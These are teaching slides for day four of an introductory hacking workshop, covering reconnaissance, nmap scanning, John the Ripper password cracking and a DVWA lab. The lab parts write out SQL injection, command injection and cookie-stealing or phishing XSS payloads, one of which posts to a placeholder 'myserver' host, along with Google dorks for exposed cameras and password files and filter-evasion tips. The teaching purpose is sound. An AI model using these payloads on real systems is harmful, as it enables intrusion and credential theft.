Hacking and Your Cybersecurity Future

# Hacking and Your Cybersecurity Future
## DAY 4
### Kendall Giles
### 23/7/2019

---

---

# LICENSE

Some of this material in this presentation has been adapted and remixed from course materials from the [Virginia Cyber Range](https://virginiacyberrange.org/) by Dave Raymond. Other images and materials are cited accordingly. This course content is provided under an [Attribution-NonCommercial-ShareAlike 4.0 International Creative Commons License](https://creativecommons.org)

---

# WORKSHOP ORIENTATION

DAY 1: *Introduction to Cybersecurity*<br />

DAY 2: *Networking*<br />

DAY 3: *Cryptography*<br />

---

# TODAY'S SCHEDULE

.small[
| TOPIC      | TIME     |
| :------ | :----------: |
| [Reconnaissance and Scanning](#6) | 9:30-10:00 |
| [LAB: OSINT](#24) | 10:00-10:15 |
| [BREAK](#26) | 10:15-10:30 |
| [Password Audits](#27) | 10:30-11:00 |
| [LAB: Password Cracking](#34) | 11:00-11:30 |
| [BREAK](#37) | 11:30-11:45 |
| [Web App Vulnerabilites](#38) | 11:45-12:00 |
| [LAB: Web App Vulnerabilities](#42) | 12:00-12:30 |
| [LUNCH BREAK](#) | 12:30-14:15 |
| [LAB: Web App Vulnerabilities Cont.](#42) | 14:15-14:45 |
| [Ethics and Privacy in Security](#63) | 14:45-15:15 |
| [BREAK](#79) | 15:15-15:30 |
| [Your Cybersecurity Future](#80) | 15:30-16:00 |
| [LAB: Explore the NICE Framework](#85) | 16:00-16:15 |
| [BREAK](#86) | 16:15-16:30 |
| [LAB: Open Discussion](#87) | 16:30-17:00 |

]

???

9:30 - 12:30PM & 2:15 - 5:00PM

---

#  Learning Objectives

+ Describe techniques for passive network reconnaissance
+ Define sweeping, scanning, OS finger printing, and banner grabbing
+ Define war-driving
+ Understand how passwords are stored on a modern operating system
+ Describe how attacks on user password hashes are carried out
+ Apply tools to attack password hash files
+ Describe why password complexity is important
+ Describe how web servers have evolved, leading to additional web application vulnerabilities
+ Understand classes of vulnerabilities in web applications that could lead to compromise
+ Apply attacks on web applications using a known vulnerable website with vulnerable applications

---

# Certificate Comments

---
class: center, middle

# Reconnaissance and Scanning

---
#  Attack Phases

+ Five P’s: Probe, Penetrate, Persist, Propagate, …Profit
+ Probe: passive and active reconnaissance
+ Penetrate: gain initial access
	+ Software vulnerabilities
	+ Weak passwords or configurations
	+ Credential stealing, social engineering, insiders
+ Persist: maintain access
	+ Compromised accounts, backdoors, rootkits, bots
	+ Covering tracks
+ Propagate: spread up and out
	+ Privilege escalation
	+ Extend to other systems or networks
+ Profit: achieve attack goals

---
#  Recon What?

+ Organization Information
	+ Names, Phone Numbers, Email Addresses
	+ Network Diagrams
	+ Procedures and Policies
+ Computers
	+ Operating Systems
	+ Version
	+ Patches
	+ Services Offered (Telnet/SSH/Web/SQL/SFTP, etc )
+ Networks
	+ Firewall Rules
	+ Intrusion Detection System (IDS) Triggers
	+ Proxies / NAT Translations

---
#  Recon How?

+ Passive
	+ Google Hacks
	+ DNS Zone Transfer
	+ War-Driving
	+ OS Fingerprinting
+ Active
	+ Social Engineering
	+ Sweeping
	+ Scanning

---
#  Google Hacking

+ Google bot crawls entire web
	+ Updated roughly every day (24 hours)
	+ Has an index of every linked web site
	+ Caches the first 101k of text for every page
+ Use advanced operators to search for specific devices or vulnerabilities!
	+ Eg: .remark-code[inurl:“ViewerFrame?Mode=”] will find public web cameras
	+ Eg: .remark-code[Intitle:*keyword*]
	+ Eg: .remark-code[Ext:*ext*]
	+ Eg: .remark-code[inurl:users.json + "username"] files containing passwords
	+ Eg: .remark-code[Intext:*text*]
	+ Lots more can be found on the *Google Hacking Database*, here: 
[https://www.offensive-security.com/community-projects/google-hacking-database/](https://www.offensive-security.com/community-projects/google-hacking-database/)

---
#  Shodan Database

+ https://www.shodan.io/
+ Find connected devices (not web sites!)

.center[<img src="hacking_assets/img/shodan.png" style="width: 40%" /><br />
.small[[https://www.shodan.io/](https://www.shodan.io/)]]

???

---> mention default passwords in equipment + IOT devices!

"Shodan collects data mostly on web servers (HTTP/HTTPS - port 80, 8080, 443, 8443), as well as FTP (port 21), SSH (port 22), Telnet (port 23), SNMP (port 161), IMAP (ports 143, or (encrypted) 993), SMTP (port 25), SIP (port 5060),[2] and Real Time Streaming Protocol (RTSP, port 554). The latter can be used to access webcams and their video stream.[3]

It was launched in 2009 by computer programmer John Matherly, who, in 2003,[4] conceived the idea of searching devices linked to the Internet.[5] The name Shodan is a reference to SHODAN, a character from the System Shock video game series.[4]"

"The website began as Matherly's pet project, based on the fact that large numbers of devices and computer systems are connected to the Internet. Shodan users are able to find systems including traffic lights, security cameras, home heating systems as well as control systems for water parks, gas stations, water plants, power grids, nuclear power plants and particle-accelerating cyclotrons;[citation needed] most have little security.[5][6] Many devices use "admin" as their user name and "1234" as their password, and the only software required to connect to them is a web browser.[6]"

---
#  Internet Archive: http://www.archive.org/

---
#  War Driving

???
#  DNS

+ DNS is a hierarchical, distributed database that maps domain names and host names to IP addresses

???
#  DNS Zone Transfer

+ DNS can be used to identify hosts on a network – even hosts that shouldn’t be available “outside”
+ Zone files on DNS servers contain mappings of hosts to IP addresses
+ “Zone transfers” are used to copy zone files between DNS servers
	+ They should ONLY be allowed between your own servers!
	+ Use the Linux **dig** utility and give it the **AXFR** option

**$ dig AXFR test.com**
+ A “split-horizon” DNS architecture protects internal hosts while allowing access to resources you want externally available (web server, email server, etc.)

#  War Dialing

+ Used to find modems / fax machines
+ Dials a range of numbers
+ Disconnects after two rings
+ Used by “Anonymous” in 2008 to discover Scientology Fax Machines

???
#  War Dialing: THC Scan

+ THC-Scan screenshot courtesy of http://indixperts.blogspot.com/2011/12/war-dialing.html 
![](hacking_assets/img/image10.jpeg)
[http://indixperts.blogspot.com/2011/12/war-dialing.html](http://indixperts.blogspot.com/2011/12/war-dialing.html)

---
#  Social Engineering

+ The art of manipulating people into divulging confidential information
+ Uses information gained from other reconnaissance methods
+ Typically, the ingress for the most successful and damaging attacks on our networks
+ Eg. *Phishing*

???

"An attempt to trick someone into revealing confidential information (e.g., a password) that can be used to attack systems or networks. Examples include: phishing—when the attacker masquerades as a legitimate business or reputable person via an e-mail or website to obtain certain information;
spear-phishing—when phishing attacks are closely tailored to the audience; and whaling—phishing that targets high ranking members of organizations.""

* email and messaging -- phishing

Uses a common or generic greeting.
Asks for immediate or urgent action.
Asks for sensitive or personal information.
Uses poor spelling or grammar.
Uses a personal email address for an official organization.
Inconsistent sender or organization address, links, or web addresses (URLs).
Tone of the email does not sound like a sender you know.

---
#  Phone Spoofing

+ Excellent method for creating false confidence
+ Combine with results of other recon efforts
+ Pretend to be Bob’s co-worker
	+ Tell him to reset his password
	+ Ask for his internet address
	+ Tell him to turn-off his anti-virus and firewall
	+ Ask him to click on a malicious e-mail

---
#  Phone Spoofing

.center[<img src="hacking_assets/img/phone_spoofing.png" style="width: 60%" /><br />.small[Image courtesy of https://www.spoofcard.com/ ]]

---
#  ICMP Ping

+ ICMP Echo Request Message (0x8)
	+ Source uses this message to verify an end-to-end path is operational
	+ Has a sequence number
	+ Has a timestamp field
+ ICMP Echo Response Message (0x0)
	+ Destination sends back with seq # / timestamp
+ Ping program collects and performs statistics
	+ Measured round-trip time
	+ Number of times remote server responds

---
#  Ping

---
#  ICMP Traceroute

---
#  Network Sweeping

+ ***Network sweeping*** is a term used to describe different techniques for finding live hosts in a range of IP addresses
+ ICMP
	+ Ping all possible addresses in target network--this is easily scripted. After sending ping, attacker waits for reply. Reply back means active machine
+ TCP
	+ Send a SYN to all machines on port 80. A SYN-ACK Reply means it is the web server
+ UDP
	+ Send UDP Packet to unusual port. Wait for ICMP Port Unreachable Message

.center[<img src="hacking_assets/img/python_code.png" style="width: 60%" /><br />.small[ping script in Python!]]

???

#  Scanning

+ ICMP Echo Requests
	+ Send ICMP (Echo Request) Packet
	+ Echo Response means IP address allocated
	+ No repsonse means indefinite state (firewall/policy)
+ Port Scanning
	+ TCP Syn Scans
	+ TCP Ack Scans
	+ TCP Fin, Xmas Tree, Null Scans
+ OS Fingerprinting

---
#  nmap

+ **nmap** is a full-service tool for active scanning
	+ Scan hosts to find open (listening) TCP and UDP ports
	+ Identifies operating system via *fingerprinting*
	+ Determines *versions* of services/servers

* Eg: *nmap 2.2.8.1* -- Default scan of a single IP
* Eg: *nmap 2.2.8.0/24 –p 1-1024* -- Default scan of IP subnet; only check well-known ports
* Eg: *nmap -n -O 2.2.8.0/24* -- nmap scan with OS fingerprinting (-O)

--> TRY: In your Kali VM, find your IP address and *sudo nmap -O YOURIP*
--> TRY: In your Kali VM, find your IP address and *sudo nmap  YOURIP/20*

???

* nmap in matrix reloaded https://www.youtube.com/watch?v=0PxTAn4g20U

---
#  OS Fingerprinting

+ Most protocol specifications have some flexibility in their implementation
	+ Default values not always specified
	+ Optional fields often allowed
+ It is up to whoever is implementing the operating system or application software that includes the protocol code to ‘fill in the blanks’
+ Differences in implementation can be used to ‘fingerprint’ various OS or application software

.center[<img src="hacking_assets/img/os_fingerprinting.png" style="width: 45%" /><br />.small[https://www.netresec.com/?page=Blog&month=2011-11&post=Passive-OS-Fingerprinting]]

???
#  OS Finger Prinitng

+ TCP
	+ Initial packet size (16 bits)
	+ Initial TTL (8 bits)
	+ Window size (16 bits)
	+ Max segment size (16 bits)
	+ Window scaling value (8 bits)
	+ "don't fragment" flag (1 bit)
	+ "sackOK" flag (1 bit)
	+ "nop" flag (1 bit)
+ These values may be combined to form a 67-bit signature, or fingerprint, for the target machine

---
#  Banner Grabbing

+ Enumeration technique to find
	+ Operating System
	+ Version of Services                               Vulnerabilities
	+ Patch Level
+ Works by connecting to a service and parsing the output from that service

???
#  Banner Grabbing Example

![](hacking_assets/img/image15.png)

---
class: center, middle, lab

#  LAB: OSINT

---

# LAB: OSINT

NOTE: Please open a browser window then go to google.com:

* Use advanced operators to search for specific devices or vulnerabilities!
  + Eg: .remark-code[inurl:“ViewerFrame?Mode=”] --> can find public web cameras
	+ Eg: .remark-code[Intitle:*keyword*]
	+ Eg: .remark-code[Ext:*ext*]
	+ Eg: .remark-code[inurl:users.json + "username"] --> can find files containing passwords
	+ Eg: .remark-code[Intext:*text*]
	+ Lots more can be found on the *Google Hacking Database*, here: 
[https://www.offensive-security.com/community-projects/google-hacking-database/](https://www.offensive-security.com/community-projects/google-hacking-database/)
* What can you find?

---
class: center, middle, break

# BREAK

---

# PASSWORD AUDITS

---

# Please start your ***1*** VM Exercise Environment

---
#  Password Storage

+ Passwords stored by your OS are not encrypted, they are hashed.
	+ A hash is a one-way function – it cannot be reversed
	+ It is possible for multiple different passwords to hash to the same value, but this is rare (hash collisions)
+ When you enter your password, it is hashed and the hash is compared to the stored hash
	+ If the hashes match, you are allowed in

---
#  Password Cracking

+ Password crackers don’t try to decrypt passwords
	+ Passwords are hashed, so they can’t be reversed!
+ Instead, values are hashed using known algorithm until a hash matches the hashed value.
	+ When the hashes match, you have the password (or a password that will work).
+ In Linux, user account data is usually stored in **/etc/passwd** and hashed passwords are stored in **/etc/shadow**

.center[<img src="hacking_assets/img/magnifying_glass.jpeg" style="width: 50%" /><br />.small[Image courtesy of Pixabay (creative commons license)]]

???

https://en.wikipedia.org/wiki/Passwd#Password_file

---
#  Password ‘salts’

+ Why can’t you just create a huge dictionary of hashed words/character strings?
	+ This *will* work on weakly-protected systems, however . . .
	+ Passwords are generally ‘salted’ with a pseudo-random string before hashing, making large-scale dictionaries untenable

.center[<img src="hacking_assets/img/dictionary.jpeg" style="width: 50%" /><br />.small[Image courtesy of Pixabay (creative commons license)]]

---

# Password Salt

* One way to make the dictionary attack more difficult to launch is to use a salt.
* Associate a random number with each userid.
* Rather than comparing the hash of an entered password with a stored hash of a password, the system compares the hash of an entered password and the salt for the associated userid with a stored hash of the password and salt.

---

# Password Search Space Size

* The search space for a dictionary attack on a salted password is of size `$2^B*D$`,
where `$B$` is the number of bits of the random salt and `$D$` is the size of the list of words for the dictionary attack.
* For example, if a system uses a 32-bit salt for each userid and its users pick passwords in a 500,000 word dictionary, then the search space for attacking salted passwords would be
`$2^{32} * 500,000 = 2,147,483,648,000,000$`, which is over 2 quadrillion.

---
#  John the Ripper

+ Popular, efficient password cracker
	+ http://www.openwall.com/john/
+ Community edition is free – you can pay for the ‘Pro’ version.
+ You can download it, but best to compile for your specific environment
	+ Highly tunable to specific architecture, processor, memory, etc.
+ By default, john starts with a password dictionary
	+ In Kali, the dictionary is at **/usr/share/john/password.lst**
	
.center[<img src="hacking_assets/img/john.png" style="width: 30%" /><br />.small[http://www.openwall.com/john/]]

---
class: center, middle, lab

#  LAB: Password Cracking

---

** # sudo useradd johnsmith** - this is the lightweight method to add user – good for a temp user

**# sudo passwd johnsmith** - used to set user’s password

**Enter new UNIX password: 12345**

**Retype new UNIX password: 12345**

**# sudo useradd janedoe**

**# sudo passwd janedoe**

**Enter new UNIX password:** <non-dictionary word with numbers, special chars, etc.>

**Retype new UNIX password:** <same as above>

---
class: lab
#  LAB: Now try to crack the passwords

“Unshadow” combines relevant portions of passwd file and shadow file.

**# sudo unshadow /etc/passwd /etc/shadow > shadow.txt**
+ Use ‘john’ to crack passwords

**# john shadow.txt**

---
class: center, middle, break

# BREAK

---

# WEB APP VULNERABILITIES

---
#  Early WWW Model

---
#  Modern WWW Model

---
#  Web-related Vulnerabilities

.pull-left[
+ Account harvesting
+ Brute force password guessing
+ Session Stealing
+ Cross Site Scripting (XSS)
+ SQL Injection
+ Command Injection
+ This is not an all-inclusive list!
]

.pull-right[<img src="hacking_assets/img/image8.jpeg" style="width: 80%" /><br />.small[Image courtesy of Pixabay (creative commons license): https://pixabay.com/]]

---

# LAB: Web App Vulnerabilities

---

#  LAB: DVWA

+ DVWA = D* Vulnerable Web App
+ Intentionally vulnerable set of web applications
+ Designed to teach basic web application security
+ “D* Vulnerable Web App (DVWA) is a PHP/MySQL web application that is vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.”

---
class: lab
#  LAB: DVWA Hands-on

.pull-left[
+ Log in to your Kali Linux VM
+ Open browser and go to http://dvwa.example.com/
+ Log in as follows:
	+ Username: **admin**
	+ Password: **password**
+ Click on DVWA Security button (lower left) and set to **low**
	+ DVWA has four security levels with increasing difficulty: low/medium/high/impossible
+ Click on **SQL Injection** button on left side menu
]
.pull-right[<img src="hacking_assets/img/image12.png" style="width: 100%" /><br />.small[http://www.dvwa.co.uk/index.php]]

---

.pull-left[
+ Attacks against web apps with back-end databases
+ Subset of ‘code injection’ attacks
	+ Effective against interpreted languages
	+ SQL, LDAP, Perl, PHP
+ Takes advantage of improperly validated user input
+ Looks for pages that allow user to submit data
	+ Login page
	+ Search page
	+ Item lookup
	+ Feedback form
]

LDAP = Lightweight Directory Access Protocol

---

+ SQL == Structured Query Language
+ Used to manipulate records stored in relational databases
+ Relational database
	+ Data is organized into **tables**
	+ Tables contain **fields** and **records**

---
class: lab
#  LAB: SQL Examples

.remark-code[SELECT [columns(s)] FROM [table] WHERE [search_criteria]]
+ Searches the database
	+ Wildcards (*) supported in columns and where clauses
	+ Boolean operators (AND, OR, NOT, etc) used for complex conditions
	+ Example:

.remark_code[UPDATE [table] SET [column] = [value] WHERE [search_criteria]]
+ Updates database
	+ Example:

+ Other useful commands: DROP, DELETE, SHUTDOWN

---

# LAB: Example SQL Java Code

```text
String accountBalanceQuery = 
  "SELECT accountNumber, balance FROM accounts 
  WHERE account_owner_id = " 
  + request.getParameter("user_id");
try {
    Statement statement = connection.createStatement();
    ResultSet rs = statement.executeQuery(accountBalanceQuery);
    while (rs.next()) {
        page.addTableRow(rs.getInt("accountNumber"),
                         rs.getFloat("balance"));
    }
} catch (SQLException e) { ... }
```
.small[https://www.veracode.com/security/sql-injection]

---

# LAB: SQL Injection Example

* Eg, "Enter your userid to view your account balance:"
* If user enters: *473*
  + *https://bankingwebsite/show_balances?user_id='473'*
  + *SELECT accountNumber, balance FROM accounts WHERE account_owner_id = '473'*
* If user enters: *0' OR '1=1*:
  + *https://bankingwebsite/show_balances?user_id='0' OR '1=1'*
  + *SELECT accountNumber, balance FROM accounts WHERE account_owner_id = '0' OR '1=1'*
  
???

"When this query is passed to the database, it will return all the account numbers and balances it has stored, and rows are added to the page to show them. The attacker now knows every user’s account numbers and balances."

---
class: lab
#  LAB: SQL Injection

+ Different back-end databases have different command syntax.
+ How do you tell what kind of database?
	+ Guess – try things until they work
	+ If you’re lucky, a malformed query might give an error
	+ Normal use: Input: *1* into the userid field
	+ Try: *%' or '0'='0* --> "mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';"
	
???

* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/
What is a SQL Injection?
SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

???

+ Try to figure out the tables:

+ Try to disclose database name
.remark-code[a' UNION SELECT null, database() #]

+ Try to disclose table names
.remark-code[a' UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema = 'dvwa' #]

+ Try to disclose user tables
.remark-code[a' UNION SELECT user,password FROM users #]

---
class: lab
#  LAB: SQL injection - Defenses

+ Validate user input
+ "Whitelist - only accept known good input
+ Avoid detailed error messages
+ Limit web server and app privileges

---
class: lab
#  LAB: Web-related Vulnerabilities

+ Account harvesting
	+ Discover usernames on a system
+ Brute force password guessing
	+ Try passwords until one works
+ Session Stealing
	+ Sniff a session ID and use it
+ Cross Site Scripting (XSS)
	+ Inject scripts that run on target server or user who logs in
+ *SQL Injection*
	+ Get extra information from database by adding “extra” SQL to web query
+ Command Injection
	+ Cause a target system to execute commands on your behalf
+ *This is not an all-inclusive list!*

---
class: lab
#  LAB: Account Harvesting

+ Targets authentication process, when a web application requests username and password
+ Works against applications that behave differently under the following circumstances:
	+ User types in an ***incorrect user ID***
	+ User types a ***correct user ID*** with an ***incorrect password***
+ Exposes valid user IDs to an attacker
+ Defense: Make sure your web apps give consistent output to the user under both scenarios

---

#  LAB: Command Injection

+ NOTE: Click on **Command Injection** button on left side menu

+ Attacker takes advantage of poorly sanitized input
+ User input is taken directly and passed to the command line using exec( ) or shell_exec ( )
+ Preventing command injection attacks
	+ Don’t make calls to exec( ) or shell_exec ( )!
	+ Sanitize input

---

#  Command Injection – Examples

+ Example:
  + NORMAL USE: 127.0.0.1
	+ HACKED: 127.0.0.1; ls
  + HACKED; 127.0.0.1; cat /etc/passwd

???

#  Command Injection – More

Windows

&& dir

&& regsvr32 /s evilfile.dll

&& wmic process list

&& wmic useraccount list

&& netstat - na

Linux

; ls

; ps aux

; netstat - na
+ ***Can you dump the password hashes (/etc/shadow or SAM)?***
+ ***If not, why not?***
+ To try these, click on the **Command Injection** button on the left side menu.

---
class: lab
#  LAB: Cross Site Scripting (XSS)

+ Attacker uses web app to send malicious code to clients
+ Can be used to
	+ Steal session data
	+ Install malware
	+ Redirect user to another page
	+ Modify page content
+ Two types
	+ Reflected – injected code is immediate reflected off the server
	+ Stored – injected code is stored on the server, such as in a forum posting

---
class: lab
#  LAB: XSS – Examples

+ NOTE: Click on **XSS (Reflected)** button on left side menu

+ Normal use: enter *Alice*

+ Simple Popup: enter

```text
<script>alert(‘TechGirls!’);</script>
```

+ Capture your webpage cookie:

```text
<script>alert(document.cookie);</script>
```

--> read about Samy Kamkar! [https://en.wikipedia.org/wiki/Samy_(computer_worm)](https://en.wikipedia.org/wiki/Samy_(computer_worm)

???

#  XSS – Test Cases

+ Phishing

document.forms[0].btnNew.onclick=myfunction; document.forms[0].action="http://myserver/phish.php";</script>
+ Cookie Stealing

cookie="+encodeURI(document.cookie);</script>
+ Fake Login

username="+username+"&password="+password+"\">");</script>
+ Try these out!  Click on the **XSS reflected** button on the left side menu.

---
class: lab
#  LAB: XSS – Defenses

+ Input Validation!
	+ Remove non alphanumeric characters
+ Use built-in PHP methods
	+ htmlspecialchars (string *$string* );
	+ strip_tags (string *$string* );
+ Escaping (AKA “output encoding”)
	+ Technique to ensure characters are received as data, not as characters that might be parsed by interpreter’s html or PHP parser

???

#  Attacker Tools

+ Web app scanning and proxies
	+ Nikto
	+ w3af
	+ Webscarab
	+ Burpsuite
	+ OWASP ZAP
+ SQL Injection
	+ sqlmap
	+ sqlninja
	+ absinthe

???

#  LAB: Evading Detection

.pull-left[
+ Some sites use filters to strip ```{text}<script>``` tags as a defense
+ These defenses can often be evaded using alternate encoding
	+ UTF-8 encoding
	+ Hex encoding
	+ URL encoding
	+ BASE64 encoding
	+ Decimal encoding
+ This calculator is at http://evuln.com/tools/xss-encoder/ 
]

???

#  Evading Detection (cont)

+ This calculator is at http://vinx.tuxfamily.org/ioc.html 
+ IP Addresses can also be obfuscated, as in this example.
![](webapp_assets/img/image14.png)
[http://vinx.tuxfamily.org/ioc.html](http://vinx.tuxfamily.org/ioc.html)

???

+ Session IDs sometimes included in URLs
+ But more often, they are non-persistent, or *session*, cookies
+ A malicious intruder can sniff the session ID and spoof a legitimate user (called *session stealing* )

???

+ Use HTTPS to secure end-to-end connection and prevent eavesdropping
+ Use large session ID space to prevent guessing and accidental collisions
+ Use random session IDs
+ Use dynamic session IDs that change from page to page

???

#  Step #1:Harden your web server!

+ Securing your web apps is useless if your web server isn’t hardened!
	+ Use a network and host-based firewalls ( iptables ?)
	+ Use built-in web server security ( mod_security ?)
	+ Turn off unnecessary services ( inetd , smtp , ssh , etc.)
	+ Minimize user accounts
	+ Set permissions carefully
	+ Keep your system patched and updated
	+ Monitor logs for malicious behavior
+ ***Minimize the attack surface!***

---

# Ethics and Privacy in Security

---

# Privacy Concepts

.pull-left[
* Do we have a “right” to privacy? — cultural, historical, personal, legal aspects
* Privacy overlaps with cybersecurity -- is a part of confidentiality
* Especially with the spread of IoT devices (scale and interconnectedness) more of our data is being collected and stored online —> motivations by law enforcement, national security, and economic incentives
* Privacy —> “information privacy”
]

---

# Aspects of Information Privacy: *Controlled Disclosure*

* You control/decide who knows certain aspects about you, your communications, or your activities
* You cede control when you give that information to a third party
  * A matter of control becomes a matter of trust
  * Similar to access control on a computer system — once you give someone/something access, you lose control what happens on the system

---

# Aspects of Information Privacy: Sensitive Data

* Some people consider some data more sensitive than other data, eg:
  * Identity 
  * Finances 
  * Legal
  * Health 
  * Biometrics 
  * Digital Footprint
* Who you are
* No universal standard for what is or is not private

---

# Aspects of Information Privacy: Affected Subject

* Owner of the data (individual, group, company, organization, government)
* Companies eg:
  * Customer lists 
  * Trade secrets 
  * Product strategy

---

# Aspects of Information Privacy: Security principles: Confidentiality, Integrity, Availability

.pull-left[
* Privacy is an aspect of confidentiality--can conflict with availability
* Would you tell a company your contact information and let them track your spending habits in return for the occasional coupon?
* Would you let a country have your social media passwords and computer passwords and phone passwords and all the data on all those accounts/devices in return for being able to cross the border?
* Privacy is controlled disclosure, but there is a tradeoff and
often a cost
]

---

# US Privacy Laws

.pull-left[
* Based on a RAND 1973 study
* Proposed a set of principles based on fair information practices, such as collection limitation, data quality, use limitation, ...
* Influenced US 1974 Privacy Act — covers data collected by US Federal Government
* Other piecemeal laws: Fair Credit Reporting Act (credit), HIPAA (health), Gramm-Leach-Bliley Act (finance), ...
* Overlapping, ambiguous, missing
]

???

* Data quality
  * Purpose specification 
  * Use limitation 
  * Security Safeguards 
  * Openness
  * Individual participation
  * Accountability
  
---

# Controls on US Government Websites

* Federal Trade Commission (FTC) has jurisdiction over websites that solicit potentially private data — requirements for privacy policy for government websites
* 2002 eGovernment Act: federal government agencies must post privacy policies
on websites disclosing:
  * Information that is to be collected
  * Reason the information is being collected
  * Intended use of the information
  * Entities with whom the information will be shared
  * Notice or opportunities for consent
  * Way in which information is to be secured
  * Rights of the individual under the Privacy Act and other relevant laws

---

# Controls on Commercial Websites

.pull-left[
* Again: piecemeal laws in some subject areas: credit, banking, healthcare, but no eGovernment act equivalent for private companies
* If a company is deceptive (its privacy policy says will not release your data but then does) the FTC has the authority to prosecute
* If the company’s privacy policy says it will do something, or does not say it won't do something, then the company can do it
  * Selling your data to third parties
  * Installing software (spyware)
  * Monitoring your camera, mic, GPS
]

---

# Governments and Privacy 1

.pull-left[
* Governments are collecting increasing amounts of our personal data 
* Risks:
  * Data error 
  * Inaccurate linking 
  * Purposely wrong 
  * False accusation 
  * Mission creep 
  *  Poorly protected
]

---

# Governments and Privacy 2

* Steps to help safeguard private data: 
  * Data minimization
  * Data anonymization
  * Auditing
  * Security and controlled access 
  * Training
  * Quality
  * Restricted usage
  * Data left in place
  * Policy

---

# Privacy and Security Going Forward

* Privacy: tradeoff between confidentiality and availability 
* Identity Theft
* Web tracking
* Data Mining
* Spyware
* RFID tags and other IoT sensors 
* Electronic voting

---

# Robert Morris

.center[<img src="hacking_assets/img/robert_morris.jpg" style="width: 50%" /><br />.small[https://pdos.csail.mit.edu/~rtm/]]

???
* The Morris worm or Internet worm of November 2, 1988, was one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention. It also resulted in the first felony conviction in the US under the 1986 Computer Fraud and Abuse Act.[1] It was written by a graduate student at Cornell University, Robert Tappan Morris, and launched on November 2, 1988, from the computer systems of the Massachusetts Institute of Technology.

* Morris' worm was developed in 1988, while he was a graduate student at Cornell University. He released the worm from MIT, rather than from Cornell. The worm exploited several vulnerabilities to gain entry to targeted systems, including:

a hole in the debug mode of the Unix sendmail program,
a buffer overrun hole in the fingerd network service,
the transitive trust enabled by people setting up rexec/rsh network logins without password requirements.

The worm was programmed to check each computer it found to determine if the infection was already present. However, Morris believed that some administrators might try to defeat his worm by instructing the computer to report a false positive. To compensate for this possibility, Morris directed the worm to copy itself anyway, 14% of the time, no matter what the response to the infection-status interrogation.

This level of persistence was a design flaw: it created system loads that not only brought it to the attention of system administrators, but also disrupted the target computers. During the ensuing trial, it was estimated that the cost in "potential loss in productivity" caused by the worm and efforts to remove it from different systems ranged from $200 to $53,000.[10]

* In 1989, Morris was indicted for violating United States Code Title 18 (18 U.S.C. § 1030), the Computer Fraud and Abuse Act.[2] He was the first person to be indicted under this act. In December 1990, he was sentenced to three years of probation, 400 hours of community service, and a fine of $10,050 plus the costs of his supervision. He appealed, but the motion was rejected the following March.[4] Morris' stated motive during the trial was "to demonstrate the inadequacies of current security measures on computer networks by exploiting the security defects [he] had discovered."[2] He completed his sentence as of 1994.

---

# Aaron Swartz

.center[<img src="hacking_assets/img/aaron_swartz.png" style="width: 60%" /><br />.small[https://www.flickr.com/photos/34166194@N00/3835494997]]

???

* regarded as a prodigy

* born November 8, 1986

* entrepreneur, co-founder of reddit

* attended stanford university, but dropped out after one year to become an entrepreneur -- this was when I followed his blog

* In 2008, Swartz founded Watchdog.net, "the good government site with teeth," to aggregate and visualize data about politicians.[35][36] In the same year, he wrote a widely circulated Guerilla Open Access Manifesto.[37][38][39][40] On December 27, 2010, Swartz filed a Freedom of Information Act (FOIA) request to learn about the treatment of Chelsea Manning, alleged source for WikiLeaks.

* In 2010,[54] Swartz co-founded Demand Progress,[55] a political advocacy group that organizes people online to "take action by contacting Congress and other leaders, funding pressure tactics, and spreading the word" about civil liberties, government reform, and other issues.

* academic publishing issue w/ jstor

* * In 2011, Swartz was arrested by Massachusetts Institute of Technology (MIT) police on state breaking-and-entering charges, after connecting a computer to the MIT network in an unmarked and unlocked closet, and setting it to download academic journal articles systematically from JSTOR using a guest user account issued to him by MIT.

---

# The Internet's Own Boy

.center[<iframe width="560" height="315" src="https://www.youtube.com/embed/RvsxnOg0bJY" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>]

???

Federal prosecutors later charged him with two counts of wire fraud and eleven violations of the Computer Fraud and Abuse Act,[13] carrying a cumulative maximum penalty of $1 million in fines, 35 years in prison, asset forfeiture, restitution, and supervised release. Swartz declined a plea bargain under which he would have served six months in federal prison. Two days after the prosecution rejected a counter-offer by Swartz, he was found dead in his Brooklyn apartment, where he had hanged himself.

* suicide: January 11, 2013 (aged 26) Brooklyn, New York City.

---

# Black, Gray, and White Hats

+ Technology is moving faster than the legal system
+ Network packets traverse state and international borders in unpredictable ways
+ Attribution of cyber attacks can be extremely difficult
+ The line between cyber espionage and cyber attack is blurred
+ Encryption can and will prevent law enforcement from accessing important digital evidence
+ Our digital economy, as well as personal privacy, relies on effective encryption technology
+ You have choices in how much you learn about these technologies and how you put that knowledge to use:
  * to protect your own privacy
  * to benefit your employer
  * to benefit humanity

???

* https://www.howtogeek.com/157460/hacker-hat-colors-explained-black-hats-white-hats-and-gray-hats/
* https://www.lifewire.com/black-hat-hacker-a-white-hat-hacker-4061415

* find some articles about FB, Google
* what software will you write?

---
class: center, middle, break

# BREAK

---

---

.center[<img src="hacking_assets/img/cybersecurity_workforce_demand.png" style="width: 55%" /><br />
.small[https://www.nist.gov/sites/default/files/documents/2019/02/07/workforce_demand_111617_final.pdf]
]

---

# Career Planning

* Cybersecurity is constantly changing, so you must be constantly learning
* Join or form a local group
* Set up your own environment and work on your own projects
* Technical:
  * Computer Networking
  * System Administration
  * Programming
* National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework: [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-181.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-181.pdf)
* [https://www.cyberseek.org](https://www.cyberseek.org)
